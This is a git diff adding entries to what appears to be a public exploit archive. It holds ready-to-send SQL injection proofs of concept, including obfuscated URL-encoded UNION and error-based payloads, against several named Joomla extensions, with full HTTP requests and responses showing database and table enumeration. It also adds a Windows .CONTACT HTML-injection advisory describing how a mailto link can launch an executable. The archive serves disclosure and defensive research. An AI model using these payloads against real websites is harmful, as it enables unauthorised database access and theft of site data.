+%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%28%53%45%4c%45%43%54%28%40%78%29%46%52%4f%4d%28%53%45%4c%45%43%54%28%40%78%3a%3d%30%78%30%30%29%2c%28%40%4e%52%3a%3d%30%29%2c%28%53%45%4c%45%43%54%28%30%29%46%52%4f%4d%28%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%29%57%48%45%52%45%28%54%41%42%4c%45%5f%53%43%48%45%4d%41%21%3d%30%78%36%39%36%65%36%36%36%66%37%32%36%64%36%31%37%34%36%39%36%66%36%65%35%66%37%33%36%33%36%38%36%35%36%64%36%31%29%41%4e%44%28%30%78%30%30%29%49%4e%28%40%78%3a%3d%43%4f%4e%43%41%54%28%40%78%2c%4c%50%41%44%28%40%4e%52%3a%3d%40%4e%52%25%32%62%31%2c%34%2c%30%78%33%30%29%2c%30%78%33%61%32%30%2c%74%61%62%6c%65%5f%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%2d%2d%20%2d + +# keysearch=[SQL] +# categories[]=[SQL] +# min=[SQL] +# max=[SQL] + +POST /[PATH]/menu-listing-layout/menuitems HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 322 +Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +csmodid=236&Itemid=303&keysearch=' union select (SELECT(@x)FROM(SELECT(@x: =0x00),(@NR +HTTP/1.1 500 You have an error in your SQL .....#__associations
0007: #__banner_clients
0008: #__banner_tracks
0009: #__banners
0010:X-Powered-By: PHP/5.6.16 +Date: Tue, 22 Jan 2019 19:04:29 GMT +Server: Apache +X-Logged-In: False +P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" +Cache-Control: no-cache +Pragma: no-cache +Vary: Accept-Encoding +Connection: close +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/46229.txt b/exploits/php/webapps/46229.txt new file mode 100644 index 000000000..478f47e6d --- /dev/null +++ b/exploits/php/webapps/46229.txt @@ -0,0 +1,38 @@ +# Exploit Title: Joomla! Component VMap 1.9.6 - SQL Injection +# Dork: N/A +# Date: 2019-01-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://wdmtech.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/vmap/ +# Version: 1.9.6 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index.php?option=com_vmap&task=loadmarker&latlngbound=[SQL]&mapid=1 +# + +GET /[PATH]/index.php?option=com_vmap&task=loadmarker&latlngbound=-40.716362432588596,40.71920853699145,-73.983044552948,-73.972959447052%20%4f%72%64%65%72%20%62%79%20%31%32%2d%2d%20%2d&mapid=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 500 XPATH syntax error:... +Date: Tue, 22 Jan 2019 21:16:19 GMT +Server: Apache +X-Powered-By: PHP/5.6.16 +X-Logged-In: False +P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" +Cache-Control: no-cache +Pragma: no-cache +Vary: Accept-Encoding +Connection: close +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked \ No newline at end of file diff --git a/exploits/php/webapps/46230.txt b/exploits/php/webapps/46230.txt new file mode 100644 index 000000000..d764ff917 --- /dev/null +++ b/exploits/php/webapps/46230.txt @@ -0,0 +1,37 @@ +# Exploit Title: Joomla! Component J-BusinessDirectory 4.9.7 - SQL Injection +# Dork: N/A +# Date: 2019-01-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://cmsjunkie.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/j-businessdirectory/ +# Version: 4.9.7 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=[SQL]&term=a +# + +GET /[PATH]/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=1%20union%20select%20(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),2--%20-&term=a HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6; PHPSESSID=c1088ee33a3f4770dd333f9605b9e44f; 704a7cf3f453ec2db97de2f28ef169f8=fb9a121113ff0e6cc6da546a82f2452e +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 +HTTP/1.1 200 OK +Date: Wed, 23 Jan 2019 15:45:13 GMT +Content-Type: application/json +Transfer-Encoding: chunked +Connection: keep-alive +Cache-Control: max-age=172800 +Expires: Fri, 25 Jan 2019 15:45:13 GMT +Alt-Svc: h2=":443"; ma=60 +Server: cloudflare +CF-RAY: 49da034bc2faba72-ATL \ No newline at end of file diff --git a/exploits/php/webapps/46231.txt b/exploits/php/webapps/46231.txt new file mode 100644 index 000000000..dec8a70c4 --- /dev/null +++ b/exploits/php/webapps/46231.txt @@ -0,0 +1,44 @@ +# Exploit Title: Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection +# Dork: N/A +# Date: 2019-01-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://cmsjunkie.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/j-classifiedsmanager/ +# Version: 3.0.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/component/jclassifiedsmanager/ +# + +&categorySearch=[SQL] +&adType=[SQL] +&citySearch=[SQL] + +POST /[PATH]/component/jclassifiedsmanager/ HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 779 +Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; 79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +searchKeyword=&categorySearch=&adType=&citySearch=1'%7c%7c%28%53%45%4c%45%43%54%20%27%45%66%65%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45 2%3d%32%20%41%4e%44%20%28%53%45%4c%45%43%54%20%32%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%32%3d%32%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&option=com_jclassifiedsmanager&controller=displayads&task=searchAds&view=displayads: undefined +HTTP/1.1 500 Internal Server Error +Date: Wed, 23 Jan 2019 15:06:56 GMT +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked +Connection: keep-alive +P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" +Cache-Control: no-cache +Pragma: no-cache +Alt-Svc: h2=":443"; ma=60 +Server: cloudflare +CF-RAY: 49d9cb37b64998d7-LAX \ No newline at end of file diff --git a/exploits/php/webapps/46232.txt b/exploits/php/webapps/46232.txt new file mode 100644 index 000000000..a1297c1d2 --- /dev/null +++ b/exploits/php/webapps/46232.txt @@ -0,0 +1,43 @@ +# Exploit Title: Joomla! Component J-MultipleHotelReservation 6.0.7 - SQL Injection +# Dork: N/A +# Date: 2019-01-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://cmsjunkie.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jmultiplehotelreservation/ +# Version: 6.0.7 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/j-myhotel/search-hotels?view=hotels +# + +%31%2d%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%73%65%6c%45%43%74%28%40%78%29%66%52%4f%6d%28%73%65%6c%45%43%74%28%40%78%3a%3d%30%78%30%30%29%2c%28%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%3a%3d%30%29,%28%40%74%62%6c%3a%3d%30%78%30%30%29%2c%28%73%65%6c%45%43%74%28%30%29%66%52%4f%6d%28%69%6e%66%6f%52%4d%41%54%69%6f%6e%5f%73%63%68%45%4d%61%2e%63%6f%4c%55%4d%6e%73%29%77%48%45%72%65%28%74%41%42%4c%65%5f%73%63%68%45%4d%61%3d%64%61%54%41%42%61%73%65%28%29%29%61%4e%64%28%30%78%30%30%29%69%6e%28%40%78%3a%3d%43%6f%6e%63%61%74%28%40%78%2c%69%66%28%28%40%74%62%6c%21%3d%74%41%42%4c%65%5f%6e%61%6d%65%29%2c%43%6f%6e%63%61%74%28%4c%50%41%44%28%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%3a=%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%20%31%2c%32%2c%30%78%33%30%29%2c%30%78%33%30%33%64%33%65%2c%40%74%42%6c%3a%3d%74%41%42%4c%65%5f%6e%61%4d%65%2c%28%40%7a%3a%3d%30%78%30%30%29%29%2c%20%30%78%30%30%29%2c%6c%70%61%64%28%40%7a%3a%3d%40%7a%20%31%2c%32%2c%30%78%33%30%29%2c%30%78%33%64%33%65%2c%30%78%34%62%36%66%36%63%36%66%36%65%33%61%32%30%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2d%2d%20%2d + +POST /[PATH]/j-myhotel/search-hotels?view=hotels HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 985 +Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; PHPSESSID=6c6c795380ae5a25888e1dd57e04320a; c9ffd68b334eb414c880fa254194ecbb=6053bfbb8394c9545ab2169c4399aefc +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +controller=search&task=searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=-1 UNION SELECT 1,(selECt(@x)fROm(selECt(@x: =0x00)%2c(@rUNNing_nuMBer +HTTP/1.1 200 OK +Date: Wed, 23 Jan 2019 15:14:32 GMT +Content-Type: text/html; charset=utf-8 +Transfer-Encoding: chunked +Connection: keep-alive +Expires: Wed, 17 Aug 2005 00:00:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Last-Modified: Wed, 23 Jan 2019 15:14:32 GMT +Alt-Svc: h2=":443"; ma=60 +Server: cloudflare +CF-RAY: 49d9d658025e22c4-LAX \ No newline at end of file diff --git a/exploits/windows/local/46222.txt b/exploits/windows/local/46222.txt new file mode 100644 index 000000000..62c9d5607 --- /dev/null +++ b/exploits/windows/local/46222.txt @@ -0,0 +1,82 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt +[+] ISR: ApparitionSec +[+] Zero Day Initiative Program +[+] ZDI-CAN-7591 + + +[Vendor] +www.microsoft.com + + +[Product] +Microsoft .CONTACT File + +A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista. +This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\. + + +[Vulnerability Type] +Mailto: HTML Link Injection Remote Code Execution + + +[Security Issue] +This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. +User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. + +The flaw is due to the processing of ".contact" files, the E-mail address field takes an expected E-mail address value, however the .CONTACT file is +vulnerable to HTML injection as no validation is performed. Therefore, if an attacker references an executable file using an HREF tag it will run that +instead without warning instead of performing the expected email behavior. This is dangerous and would be unexpected to an end user. + +The E-mail addresses Mailto: will point to an arbitrary executable like. +pwn@microsoft.com + +Additionally the executable file can live in a sub-directory and be referenced like "pwn@microsoft.com" or attackers can use +directory traversal techniques to point to a malware say sitting in the targets Downloads directory like: + +pwn@microsoft.com + +Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected using certain archive utils. + +This advisory was initially one of three different vulnerabilities I reported to Zero Day Initiative Program (ZDI), that microsoft decided to not release a security fix +for and close. The first cases I reported to ZDI were .VCF and .CONTACT files Website address input fields. + +This example is yet another vector affecting Windows .CONTACT files and is being released as the .CONTACT file issue is now publicly known. + + +[Exploit/POC] +Create a Windows .CONTACT file and inject the following HTML into the E-mail: field + +pwn@microsoft.com + +Windows will prompt you like "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?" + +Click Yes. + +Open the .CONTACT file and click the Mailto: link BOOM! Windows calculator will execute. + + +Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files will also execute! :) + + +[POC Video URL] +https://vimeo.com/312824315 + + +[Disclosure Timeline] +Reported to ZDI 2018-11-22 (ZDI-CAN-7591) +Another separate vulnerability affecting MS Windows .contact files affected the Website address input fields and was publicly disclosed January 16, 2019. +https://www.zerodayinitiative.com/advisories/ZDI-19-121/ +Public disclosure : January 22, 2019 + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b824d1a15..588367c7f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10239,6 +10239,7 @@ id,file,description,date,author,type,platform,port 46186,exploits/linux/local/46186.rb,"blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)",2019-01-16,Metasploit,local,linux, 46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows, 46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows, +46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -40698,3 +40699,14 @@ id,file,description,date,author,type,platform,port 46214,exploits/php/webapps/46214.txt,"PHP Uber-style GeoTracking 1.1 - SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80 46217,exploits/php/webapps/46217.txt,"Adianti Framework 5.5.0 - SQL Injection",2019-01-21,"Joner de Mello Assolin",webapps,php,80 46219,exploits/php/webapps/46219.txt,"Joomla! Component Easy Shop 1.2.3 - Local File Inclusion",2019-01-22,"Ihsan Sencan",webapps,php,80 +46221,exploits/linux/webapps/46221.py,"Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation",2019-01-23,"Chris Lyne",webapps,linux, +46223,exploits/php/webapps/46223.txt,"Joomla! Component vBizz 1.0.7 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80 +46224,exploits/php/webapps/46224.txt,"Joomla! Component vBizz 1.0.7 - Remote Code Execution",2019-01-23,"Ihsan Sencan",webapps,php,80 +46225,exploits/php/webapps/46225.txt,"Joomla! Component vWishlist 1.0.1 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80 +46226,exploits/php/webapps/46226.txt,"Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80 +46227,exploits/php/webapps/46227.txt,"Joomla! Component vReview 1.9.11 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80 +46228,exploits/php/webapps/46228.txt,"Joomla! Component vRestaurant 1.9.4 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80 +46229,exploits/php/webapps/46229.txt,"Joomla! Component VMap 1.9.6 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80 +46230,exploits/php/webapps/46230.txt,"Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80 +46231,exploits/php/webapps/46231.txt,"Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php, +46232,exploits/php/webapps/46232.txt,"Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection",2019-01-23,"Ihsan Sencan",webapps,php,80